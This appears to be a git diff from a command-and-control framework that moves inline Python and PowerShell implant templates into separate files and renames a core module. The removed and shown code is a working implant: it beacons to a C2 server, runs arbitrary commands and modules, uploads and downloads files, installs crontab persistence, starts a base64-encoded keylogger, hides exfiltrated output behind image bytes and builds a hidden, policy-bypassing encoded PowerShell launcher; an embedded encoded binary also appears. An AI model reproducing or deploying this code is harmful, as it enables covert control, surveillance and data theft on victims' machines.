0FnSUNBZ0lDQjNhR1Z1SURVMURRb2dJQ0FnSUNBZ0lDQWdJQ0JqZEhKc1kyaGhjaUE5SUNKYlkyMWtYU0lOQ2lBZ0lDQWdJQ0FnSUNCM2FHVnVJRFUyRFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkSEpzWTJoaGNpQTlJQ0piYzJocFpuUmRJZzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdOVGNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRqWVhCelhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTREUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJiM0IwYVc5dVhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTVEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJZM1J5YkYwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBMk13MEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaVcyWnVYU0lOQ2lBZ0lDQWdJQ0FnSUNCbGJITmxEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSWlEUW9nSUNBZ0lDQWdJR1Z1WkEwS0lDQWdJQ0FnSUNCcFppQmpkSEpzWTJoaGNpQTlQU0FpSWlCaGJtUWdZWE5qYVdrZ1BUMGdNQTBLSUNBZ0lDQWdJQ0FnSUd0amFISWdQU0JEWVhKaWIyNHVSMlYwVTJOeWFYQjBWbUZ5YVdGaWJHVW9VMDFmUzBOSVVsOURRVU5JUlN3Z1UwMWZRMVZTVWtWT1ZGOVRRMUpKVUZRcERRb2dJQ0FnSUNBZ0lDQWdZM1Z5Y2w5aGMyTnBhU0E5SUVOaGNtSnZiaTVMWlhsVWNtRnVjMnhoZEdVb2EyTm9jaXdnYXl3Z2MzUmhkR1VwRFFvZ0lDQWdJQ0FnSUNBZ1kzVnljbDloYzJOcGFTQTlJR04xY25KZllYTmphV2tnUGo0Z01UWWdhV1lnWTNWeWNsOWhjMk5wYVNBOElERU5DaUFnSUNBZ0lDQWdJQ0J3Y21WMlgyUnZkMjViYTEwZ1BTQjBjblZsRFFvZ0lDQWdJQ0FnSUNBZ2FXWWdZM1Z5Y2w5aGMyTnBhU0E5UFNBd0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqWVhCZlpteGhaeUE5SUhSeWRXVU5DaUFnSUNBZ0lDQWdJQ0JsYkhObERRb2dJQ0FnSUNBZ0lDQWdJQ0JoYzJOcGFTQTlJR04xY25KZllYTmphV2tOQ2lBZ0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lDQWdaV3h6YVdZZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQWdJQ0FnSUNCd2NtVjJYMlJ2ZDI1YmExMGdQU0IwY25WbERRb2dJQ0FnSUNBZ0lHVnVaQTBLSUNBZ0lDQWdaVzVrRFFvZ0lDQWdaV3h6WlEwS0lDQWdJQ0FnY0hKbGRsOWtiM2R1VzJ0ZElEMGdabUZzYzJVTkNpQWdJQ0JsYm1RTkNpQWdaVzVrRFFvZ0lHbG1JR0Z6WTJscElDRTlJREFnYjNJZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQnBaaUJoY0hCZmJtRnRaU0FoUFNCc1lYTjBWMmx1Wkc5M0RRb2dJQ0FnSUNCd2RYUnpJQ0pjYmx4dVd5TjdZWEJ3WDI1aGJXVjlYU0F0SUZzamUxUnBiV1V1Ym05M2ZWMWNiaUlOQ2lBZ0lDQWdJR3hoYzNSWGFXNWtiM2NnUFNCaGNIQmZibUZ0WlEwS0lDQWdJR1Z1WkEwS0lDQWdJR2xtSUdOMGNteGphR0Z5SUNFOUlDSWlEUW9nSUNBZ0lDQndjbWx1ZENBaUkzdGpkSEpzWTJoaGNuMGlEUW9nSUNBZ1pXeHphV1lnWVhOamFXa2dQaUF6TWlCaGJtUWdZWE5qYVdrZ1BDQXhNamNOQ2lBZ0lDQWdJR01nUFNCcFppQmpZWEJmWm14aFp5QjBhR1Z1SUdGelkybHBMbU5vY2k1MWNHTmhjMlVnWld4elpTQmhjMk5wYVM1amFISWdaVzVrRFFvZ0lDQWdJQ0J3Y21sdWRDQWlJM3RqZlNJTkNpQWdJQ0JsYkhObERRb2dJQ0FnSUNCd2NtbHVkQ0FpV3lON1lYTmphV2w5WFNJTkNpQWdJQ0JsYm1RTkNpQWdJQ0FrYzNSa2IzVjBMbVpzZFhOb0RRb2dJR1Z1WkEwS0lDQkxaWEp1Wld3dWMyeGxaWEFvTUM0d01Ta05DbVZ1WkEwS0RRbz1cJykpIiB8IHJ1YnkgPiAlcyAyPiYxICYnICUgZmlsZW5hbWUpLnJlYWQoKQp0aW1lLnNsZWVwKDEpCg==" - modb64logger = base64.b64decode(b64logger) - modpayload = modb64logger.replace("REPLACEME",filename) - exec(modpayload) - pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() - returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) - return returnval - -def dfile(fname): - if fname: - with open(fname, "rb") as image_file: - imgbytes = image_file.read() - return "0000100001" + imgbytes - -def ufile(base64file, fname): - fname = fname.replace('"','') - filebytes = base64.b64decode(base64file) - try: - output_file = open(fname, 'w') - output_file.write(filebytes) - output_file.close() - return "Uploaded file %%s" %% fname - except Exception as e: - return "Error with source file: %%s" %% e - -def sai(delfile=False): - import uuid - filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess - returnval = "Ran Start Another Implant - File dropped: %%s" %% filename - p = subprocess.Popen(["sh", filename]) - if delfile: - p = subprocess.Popen(["rm", filename]) - returnval = "Ran Start Another Implant - File removed: %%s" %% filename - return returnval - -def persist(): - import uuid, os - dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) - os.mkdir(dircontent) - filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess as s - s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) - return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename - -def remove_persist(): - import subprocess as s - s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) - return "Removed user persistence via crontab: \\r\\n**must delete files manually**" - -def decrypt_bytes_gzip( key, data): - iv = data[0:16] - aes = get_encryption(key, iv) - data = aes.decrypt( data ) - import StringIO - import gzip - infile = StringIO.StringIO(data[16:]) - with gzip.GzipFile(fileobj=infile, mode="r") as f: - data = f.read() - return data - -while(True): - cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") - if cstr < kd: - key = "%s" - uri = "%s" - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - try: - time.sleep(timer) - ua='%s' - if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) - else: req=urllib2.Request(server,headers={'User-agent':ua}) - res=urllib2.urlopen(req); - html = res.read() - except Exception as e: - E = e - #print "error %%s" %% e - #print html - if html: - try: - returncmd = decrypt( key, html ) - returncmd = returncmd.rstrip('\\0') - - if "multicmd" in returncmd: - - returncmd = returncmd.replace("multicmd","") - returnval = "" - split = returncmd.split("!d-3dion@LD!-d") - - for cmd in split: - if cmd[:10] == "$sleeptime": - timer = int(cmd.replace("$sleeptime = ","")) - elif cmd[:13] == "download-file": - fname = cmd.replace("download-file ","") - returnval = dfile(fname) - elif cmd[:11] == "upload-file": - fullparams = cmd.replace("upload-file ","") - params = fullparams.split(":") - returnval = ufile(params[1],params[0]) - elif cmd[:19] == "install-persistence": - returnval = persist() - elif cmd[:14] == "get-keystrokes": - returnval = keylog() - elif cmd[:18] == "remove-persistence": - returnval = remove_persist() - elif cmd[:19] == "startanotherimplant": - returnval = sai(delfile=True) - elif cmd[:28] == "startanotherimplant-keepfile": - returnval = sai() - elif cmd[:10] == "loadmodule": - module = cmd.replace("loadmodule","") - exec(module) - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - if s.getvalue(): - returnval = s.getvalue() - else: - returnval = "Module loaded" - except Exception as e: - returnval = "Error with source file: %%s" %% e - - elif cmd.startswith("linuxprivchecker"): - args = cmd[len('linuxprivchecker'):].strip() - args = args.split() - pycode_index = args.index('-pycode') - encoded_module = args[pycode_index +1] - args.pop(pycode_index) - args.pop(pycode_index) - pycode = base64.b64decode(encoded_module) - process = ['python', '-c', pycode] - pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode - import subprocess - returnval = subprocess.check_output(['python', '-c', pycode] + args) - - elif cmd[:6] == "python": - module = cmd.replace("python ","") - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - - returnval = s.getvalue() - - except Exception as e: - returnval = "Error with source file: %%s" %% e - - else: - try: - returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) - except subprocess.CalledProcessError as exc: - returnval = "ErrorCmd: %%s" %% exc.output - - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - opener = urllib2.build_opener() - if (len(cmd) > 200): - cmd = cmd[0:200] - postcookie = encrypt(key, cmd) - data = base64.b64decode(random.choice(icoimage)) - dataimage = data.ljust( 1500, '\\0' ) - dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) - if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - res=urllib2.urlopen(req); - response = res.read() - - except Exception as e: - E = e - #print "error %%s" %% e - w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) - self.C2Core = """ -$key="%s" -$global:sleeptime = '%s' - -$payloadclear = @" -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} -`$s="$s" -`$sc="$sc" -function DEC {${function:DEC}} -function ENC {${function:ENC}} -function CAM {${function:CAM}} -function Get-Webclient {${function:Get-Webclient}} -function Primer {${function:primer}} -`$primer = primer -if (`$primer) {`$primer| iex} else { -start-sleep 1800 -primer | iex } -"@ - -$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) -$CompressedStream = New-Object IO.MemoryStream -$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) -$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) -$DeflateStream.Dispose() -$CompressedScriptBytes = $CompressedStream.ToArray() -$CompressedStream.Dispose() -$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) -$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" -$UnicodeEncoder = New-Object System.Text.UnicodeEncoding -$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) -$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" -$payload = $payloadraw -replace "`n", "" - -function GetImgData($cmdoutput) { - $icoimage = @(%s) - - try {$image = $icoimage|get-random}catch{} - - function randomgen - { - param ( - [int]$Length - ) - $set = "...................@..........................Tyscf".ToCharArray() - $result = "" - for ($x = 0; $x -lt $Length; $x++) - {$result += $set | Get-Random} - return $result - } - $imageBytes = [Convert]::FromBase64String($image) - $maxbyteslen = 1500 - $maxdatalen = 1500 + ($cmdoutput.Length) - $imagebyteslen = $imageBytes.Length - $paddingbyteslen = $maxbyteslen - $imagebyteslen - $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) - $ImageBytesFull = New-Object byte[] $maxdatalen - [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) - [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) - [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) - $ImageBytesFull -} -function Create-AesManagedObject($key, $IV) { - try { - $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" - } catch { - $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" - } - $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC - $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros - $aesManaged.BlockSize = 128 - $aesManaged.KeySize = 256 - if ($IV) { - if ($IV.getType().Name -eq "String") { - $aesManaged.IV = [System.Convert]::FromBase64String($IV) - } - else { - $aesManaged.IV = $IV - } - } - if ($key) { - if ($key.getType().Name -eq "String") { - $aesManaged.Key = [System.Convert]::FromBase64String($key) - } - else { - $aesManaged.Key = $key - } - } - $aesManaged -} - -function Encrypt-String($key, $unencryptedString) { - $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); - [byte[]] $fullData = $aesManaged.IV + $encryptedData - #$aesManaged.Dispose() - [System.Convert]::ToBase64String($fullData) -} -function Encrypt-Bytes($key, $bytes) { - [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream - $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) - $gzipStream.Write( $bytes, 0, $bytes.Length ) - $gzipStream.Close() - $bytes = $output.ToArray() - $output.Close() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String($key, $encryptedStringWithIV) { - $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor(); - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); - #$aesManaged.Dispose() - [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) -} -function Encrypt-String2($key, $unencryptedString) { - $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $CompressedStream = New-Object IO.MemoryStream - $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) - $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) - $DeflateStream.Dispose() - $bytes = $CompressedStream.ToArray() - $CompressedStream.Dispose() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String2($key, $encryptedStringWithIV) { - $bytes = $encryptedStringWithIV - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor() - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) - $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() - $output - #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) -} -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} - -$URI= "%s" -$Server = "$s/%s" -$ServerClean = "$sc" -while($true) -{ - $ServerURLS = "$($ServerClean)","$($ServerClean)" - $date = (Get-Date -Format "dd/MM/yyyy") - $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) - $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) - if ($killdate -lt $date) {exit} - $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) - $newsleep = $sleeptimeran|get-random - if ($newsleep -lt 1) {$newsleep = 5} - start-sleep $newsleep - $URLS = %s - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} - - while($ReadCommand) { - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} - $error.clear() - if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { - if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { - $splitcmd = $ReadCommandClear -replace "multicmd","" - $split = $splitcmd -split "!d-3dion@LD!-d" - foreach ($i in $split){ - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - $error.clear() - if ($i.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $i | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $i -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } else { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $Response = Encrypt-String $key $i - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null - } catch{} - } - } - } - elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - - } elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $ReadCommandClear | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $ReadCommandClear -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - - } else { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null - } catch {} - } - $ReadCommandClear = $null - $ReadCommand = $null - } - break - } -}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) + py_implant_core = open("%s/PyImplant-Core.py" % FilesDirectory, 'r').read() + self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) + ps_implant_core = open("%s/PSImplant-Core.ps1" % FilesDirectory, 'r').read() + self.C2Core = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self): @@ -607,8 +101,8 @@ while($true) new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label) def autoruns(self): - new_task("loadmodule Implant-Core.ps1", self.RandomURI) - update_mods("Implant-Core.ps1", self.RandomURI) + new_task("loadmodule Core.ps1", self.RandomURI) + update_mods("Core.ps1", self.RandomURI) result = get_autoruns() if result: autoruns = "" diff --git a/ImplantHandler.py b/ImplantHandler.py index 7ffcc01..7007602 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -250,7 +250,7 @@ def startup(printhelp = ""): startup() if "output-to-html" in implant_id.lower(): - generate_table("CompletedTasks") + generate_table("Tasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") @@ -307,7 +307,7 @@ def startup(printhelp = ""): startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) if "opsec" in implant_id.lower(): implants = get_implants_all() - comtasks = get_completedtasks() + comtasks = get_tasks() hosts = "" uploads = "" urls = "" @@ -729,9 +729,9 @@ def runcommand(command, randomuri): else: try: - check_module_loaded("Implant-Core.ps1", randomuri) + check_module_loaded("Core.ps1", randomuri) except Exception as e: - print ("Error loading Implant-Core.ps1: %s" % e) + print ("Error loading Core.ps1: %s" % e) run_autoloads(command, randomuri) diff --git a/Modules/Implant-Core.ps1 b/Modules/Core.ps1 similarity index 96% rename from Modules/Implant-Core.ps1 rename to Modules/Core.ps1 index ad44efb..980878c 100644 --- a/Modules/Implant-Core.ps1 +++ b/Modules/Core.ps1 @@ -392,6 +392,10 @@ Function Get-Screenshot $psloadedscreen = $null function Get-ScreenshotAllWindows { + param( + [string] $TaskId + ) + if ($psloadedscreen -ne "TRUE") { $script:psloadedscreen = "TRUE" $ps = "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